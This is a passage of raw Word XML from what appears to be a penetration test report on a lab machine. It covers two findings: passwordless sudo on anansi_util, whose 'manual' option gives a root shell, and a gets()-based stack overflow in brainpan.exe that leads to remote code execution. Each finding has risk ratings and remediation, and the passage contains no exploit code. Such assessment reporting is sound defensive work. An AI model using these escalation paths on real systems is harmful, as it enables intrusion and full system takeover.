            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="5A9F38FD" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="295A1F03" w14:textId="69B2A1C4" w:rsidR="004A0A96" w:rsidRDefault="00C477FD" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="14"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFC000"/>
          </w:tcPr>
          <w:p w14:paraId="016470D6" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="054984CF" w14:textId="6E591AF7" w:rsidR="004A0A96" w:rsidRDefault="003D6942" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="14"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="00AE50"/>
          </w:tcPr>
          <w:p w14:paraId="70789C1D" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5E0A0299" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="12"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2014" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="006EC0"/>
          </w:tcPr>
          <w:p w14:paraId="41127E20" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:spacing w:before="9"/>
              <w:ind w:left="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Century Gothic"/>
                <w:b/>
                <w:sz w:val="26"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="7D7D6398" w14:textId="372C6F3B" w:rsidR="004A0A96" w:rsidRDefault="003D6942" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="10"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="32"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
              </w:rPr>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004A0A96" w14:paraId="22DC0D26" w14:textId="77777777" w:rsidTr="00230918">
        <w:trPr>
          <w:trHeight w:val="390"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B8C59DD" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="509" w:right="493"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2014" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12604782" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="323" w:right="309"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-4"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="12A40000" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="509" w:right="493"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Moderate</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2015" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38A0B533" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="503" w:right="493"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-5"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2014" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="08543E05" w14:textId="77777777" w:rsidR="004A0A96" w:rsidRDefault="004A0A96" w:rsidP="00230918">
            <w:pPr>
              <w:pStyle w:val="TableParagraph"/>
              <w:ind w:left="323" w:right="312"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:spacing w:val="-2"/>
                <w:sz w:val="24"/>
              </w:rPr>
              <w:t>Informational</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0B4C40AA" w14:textId="77777777" w:rsidR="009026C9" w:rsidRDefault="009026C9" w:rsidP="00B55FEA">
      <w:pPr>
        <w:spacing w:after="0"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47D44A09" w14:textId="1BA7B15F" w:rsidR="00ED1AF7" w:rsidRPr="00B55FEA" w:rsidRDefault="00C477FD" w:rsidP="00B55FEA">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B55FEA">
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">Improper Privileges – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B55FEA">
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B55FEA">
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="9230"/>
      </w:tblGrid>
      <w:tr w:rsidR="00C477FD" w14:paraId="476AA81F" w14:textId="77777777" w:rsidTr="00D47754">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="174C67C4" w14:textId="64CFE9D9" w:rsidR="00C477FD" w:rsidRDefault="00C477FD" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Severity:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="C00000"/>
          </w:tcPr>
          <w:p w14:paraId="6935938E" w14:textId="138E25D4" w:rsidR="00C477FD" w:rsidRDefault="00C477FD" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C477FD" w14:paraId="76C6937F" w14:textId="77777777" w:rsidTr="00D47754">
        <w:trPr>
          <w:trHeight w:val="1160"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="61C07890" w14:textId="7AC14DC2" w:rsidR="00C477FD" w:rsidRDefault="00C477FD" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FDE1B35" w14:textId="6668C038" w:rsidR="00C477FD" w:rsidRDefault="001F5FC7" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Local user </w:t>
            </w:r>
            <w:r>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:t>puck</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> has </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> privileges to execute </w:t>
            </w:r>
            <w:r w:rsidRPr="001F5FC7">
              <w:t>/home/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001F5FC7">
              <w:t>anansi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="001F5FC7">
              <w:t>/bin/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="001F5FC7">
              <w:t>anansi_util</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> as root with no password requirement. This binary has an option to run the </w:t>
            </w:r>
            <w:r>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:t>manual</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> command, which has an option to run shell commands. This allows an attacker to escalate privileges to root with ease.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C477FD" w14:paraId="50032BF7" w14:textId="77777777" w:rsidTr="00D47754">
        <w:trPr>
          <w:trHeight w:val="1448"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3B1567C6" w14:textId="2A0A578D" w:rsidR="00C477FD" w:rsidRDefault="00C506D6" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Risk:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0962C5BF" w14:textId="2F8F5B47" w:rsidR="00C477FD" w:rsidRDefault="00C506D6" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Likelihood: </w:t>
            </w:r>
            <w:r w:rsidR="008A442C">
              <w:t>High</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> This </w:t>
            </w:r>
            <w:r w:rsidR="000A1033">
              <w:t xml:space="preserve">simple </w:t>
            </w:r>
            <w:r>
              <w:t>attack can be used to gain root privileges once an attacker has already gained initial access</w:t>
            </w:r>
            <w:r w:rsidR="00D03EF8">
              <w:t xml:space="preserve"> to </w:t>
            </w:r>
            <w:r w:rsidR="00033555">
              <w:t>the target system</w:t>
            </w:r>
            <w:r w:rsidR="00D03EF8">
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61261805" w14:textId="77777777" w:rsidR="005B1F5B" w:rsidRDefault="005B1F5B" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3F3ADB7D" w14:textId="67657192" w:rsidR="003858BF" w:rsidRDefault="003858BF" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Impact: Very High </w:t>
            </w:r>
            <w:r w:rsidR="00C64E56">
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00C64E56">
              <w:t>An attacker with root privileges has complete control over the system and all its assets.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00F25534" w14:paraId="01563790" w14:textId="77777777" w:rsidTr="00D47754">
        <w:trPr>
          <w:trHeight w:val="440"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0C3DC1C8" w14:textId="0104409A" w:rsidR="00F25534" w:rsidRDefault="00F25534" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Remediation:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="383FC430" w14:textId="4B3BF1B9" w:rsidR="00A77ABE" w:rsidRDefault="00F25534" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Instead of full </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>sudo</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> access, use </w:t>
            </w:r>
            <w:r w:rsidR="00B52C01">
              <w:t>Linux</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> capabilities</w:t>
            </w:r>
            <w:r w:rsidR="007B57C0">
              <w:t xml:space="preserve"> (</w:t>
            </w:r>
            <w:r w:rsidR="00D47754">
              <w:t xml:space="preserve">such as </w:t>
            </w:r>
            <w:r w:rsidR="007B57C0" w:rsidRPr="007B57C0">
              <w:t>CAP_SETUID</w:t>
            </w:r>
            <w:r w:rsidR="007B57C0">
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> to give </w:t>
            </w:r>
            <w:r>
              <w:t>“</w:t>
            </w:r>
            <w:r>
              <w:t>puck</w:t>
            </w:r>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="001B1895">
              <w:t xml:space="preserve">temporary </w:t>
            </w:r>
            <w:r>
              <w:t>root permissions to the necessary options</w:t>
            </w:r>
            <w:r w:rsidR="007B57C0">
              <w:t xml:space="preserve"> (excluding </w:t>
            </w:r>
            <w:r w:rsidR="007B57C0">
              <w:t>“</w:t>
            </w:r>
            <w:r w:rsidR="007B57C0">
              <w:t>manual</w:t>
            </w:r>
            <w:r w:rsidR="007B57C0">
              <w:t>”</w:t>
            </w:r>
            <w:r w:rsidR="007B57C0">
              <w:t>)</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> in the </w:t>
            </w:r>
            <w:r>
              <w:t>“</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>anansi_util</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>”</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> binary.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00C477FD" w14:paraId="0F0335BD" w14:textId="77777777" w:rsidTr="00D47754">
        <w:trPr>
          <w:trHeight w:val="638"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24BA8F9A" w14:textId="6DE5F1A7" w:rsidR="00C477FD" w:rsidRDefault="005B1F5B" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>References:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9230" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="07349418" w14:textId="77777777" w:rsidR="005B1F5B" w:rsidRDefault="00000000" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId9" w:history="1">
              <w:r w:rsidR="005B1F5B" w:rsidRPr="005B1F5B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://gtfobins.github.io/gtfobins/man/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="081BAF00" w14:textId="77777777" w:rsidR="005B1F5B" w:rsidRDefault="00000000" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId10" w:history="1">
              <w:r w:rsidR="005B1F5B" w:rsidRPr="005B1F5B">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://andreafortuna.org/2018/05/16/exploiting-sudo-for-linux-privilege-escalation/</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
          <w:p w14:paraId="2423DDDD" w14:textId="6C80CA9B" w:rsidR="004F75D5" w:rsidRDefault="00000000" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:hyperlink r:id="rId11" w:history="1">
              <w:r w:rsidR="004F75D5" w:rsidRPr="004F75D5">
                <w:rPr>
                  <w:rStyle w:val="Hyperlink"/>
                </w:rPr>
                <w:t>https://wiki.archlinux.org/title/capabilities</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4D4D61A0" w14:textId="77777777" w:rsidR="00B20DAE" w:rsidRDefault="00B20DAE" w:rsidP="00D102BD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6B16C0FA" w14:textId="531FA520" w:rsidR="3EFF00EC" w:rsidRDefault="003F5840" w:rsidP="00D102BD">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D102BD">
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Improper Bounds Checking – Stack Buffer Overflow</w:t>
      </w:r>
      <w:r w:rsidR="00DE7B9B">
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> to RCE</w:t>
      </w:r>
      <w:r w:rsidRPr="00D102BD">
        <w:rPr>
          <w:rFonts w:hAnsi="Avenir Next LT Pro"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve"> (brainpan.exe)</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1560"/>
        <w:gridCol w:w="9230"/>
      </w:tblGrid>
      <w:tr w:rsidR="00D102BD" w:rsidRPr="00D102BD" w14:paraId="0C090202" w14:textId="77777777" w:rsidTr="00D47754">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3183716F" w14:textId="2E14A341" w:rsidR="00D102BD" w:rsidRPr="00D102BD" w:rsidRDefault="00D102BD" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r w:rsidRPr="00D102BD">
              <w:t>Severity</w:t>
            </w:r>
            <w:r>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9347" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FF0000"/>
          </w:tcPr>
          <w:p w14:paraId="1AA37695" w14:textId="58EFEB8E" w:rsidR="00D102BD" w:rsidRPr="00D102BD" w:rsidRDefault="00D102BD" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t>High</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D102BD" w:rsidRPr="00D102BD" w14:paraId="6A768C79" w14:textId="77777777" w:rsidTr="00D47754">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="509EABF7" w14:textId="37765C96" w:rsidR="00D102BD" w:rsidRPr="00D102BD" w:rsidRDefault="00D102BD" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Description:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="72380722" w14:textId="5D1F1DBB" w:rsidR="00DE7B9B" w:rsidRPr="00D102BD" w:rsidRDefault="00CD319E" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">The </w:t>
            </w:r>
            <w:r w:rsidR="004212D3">
              <w:t>executable</w:t>
            </w:r>
            <w:r w:rsidR="00DE7B9B">
              <w:t xml:space="preserve"> running on port 9999 (brainpan.exe) is vulnerable to a stack buffer overflow due to using the insecure </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="00DE7B9B">
              <w:t>gets(</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="00DE7B9B">
              <w:t>) function to receive user input, which doesn</w:t>
            </w:r>
            <w:r w:rsidR="00DE7B9B">
              <w:t>’</w:t>
            </w:r>
            <w:r w:rsidR="00DE7B9B">
              <w:t>t do any bounds checking. This allows an attacker to take control of the program flow and execute code off the stack, leading to</w:t>
            </w:r>
            <w:r w:rsidR="00BF13B3">
              <w:t xml:space="preserve"> arbitrary</w:t>
            </w:r>
            <w:r w:rsidR="00DE7B9B">
              <w:t xml:space="preserve"> remote code execution (RCE).</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00D102BD" w:rsidRPr="00D102BD" w14:paraId="06C548D1" w14:textId="77777777" w:rsidTr="00D47754">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1443" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="60F7F82A" w14:textId="125C0A95" w:rsidR="00D102BD" w:rsidRPr="00D102BD" w:rsidRDefault="00CD319E" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:t>Risk:</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9347" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="168B261F" w14:textId="77777777" w:rsidR="00D102BD" w:rsidRDefault="00CD319E" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Likelihood: </w:t>
            </w:r>
            <w:r w:rsidR="008A442C">
              <w:t xml:space="preserve">High - </w:t>
            </w:r>
            <w:r>
              <w:t>The vulnerable service is completely exposed to the internet and is</w:t>
            </w:r>
            <w:r w:rsidR="003D0A92">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidR="003D0A92">
              <w:t>fairly</w:t>
            </w:r>
            <w:r w:rsidR="00CE0226">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="003D0A92">
              <w:t>trivial</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="000678F9">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00CE0226">
              <w:t>to exploit.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69317879" w14:textId="77777777" w:rsidR="00FB5040" w:rsidRDefault="00FB5040" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="23F846EA" w14:textId="27694C9B" w:rsidR="0087376C" w:rsidRPr="00D102BD" w:rsidRDefault="0087376C" w:rsidP="003B6416">
            <w:pPr>
              <w:spacing w:after="0"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">Impact: Very High </w:t>
            </w:r>
            <w:r>
              <w:t>–</w:t>
            </w:r>
            <w:r>
              <w:t xml:space="preserve"> An attacker can </w:t>
            </w:r>
            <w:r w:rsidR="00F9199D">
              <w:t xml:space="preserve">leverage the RCE to </w:t>
            </w:r>
            <w:r>
              <w:t>gain shell access to the server and escalate privileges or pivot to other internal machines.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
